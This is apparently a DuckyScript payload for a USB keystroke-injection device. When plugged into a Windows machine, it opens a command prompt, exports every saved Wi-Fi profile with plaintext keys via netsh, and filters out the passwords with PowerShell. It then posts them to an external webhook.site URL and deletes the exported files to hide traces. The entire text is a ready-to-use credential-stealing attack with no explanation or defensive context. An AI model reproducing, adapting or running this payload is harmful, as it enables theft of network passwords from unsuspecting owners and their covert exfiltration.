DELAY 6000
ALT
DELAY 500
STRING f
DELAY 500
GUI r
DELAY 500
STRING cmd
DELAY 500
ENTER
DELAY 1000
STRING cd %temp%
ENTER
DELAY 500
STRING netsh wlan export profile key=clear
ENTER
DELAY 500
STRING powershell Select-String -Path Wi-Fi*.xml -Pattern 'keyMaterial' > WiFi-key
ENTER
DELAY 1000
STRING powershell Invoke-WebRequest -Uri https://webhook.site/073612ac-bc75-40ca-9a61-7761ab31a0b0 -Method Post -InFile WiFi-key
ENTER
STRING del Wi* /s/f/q
ENTER
DELAY 500
STRING exit
ENTER
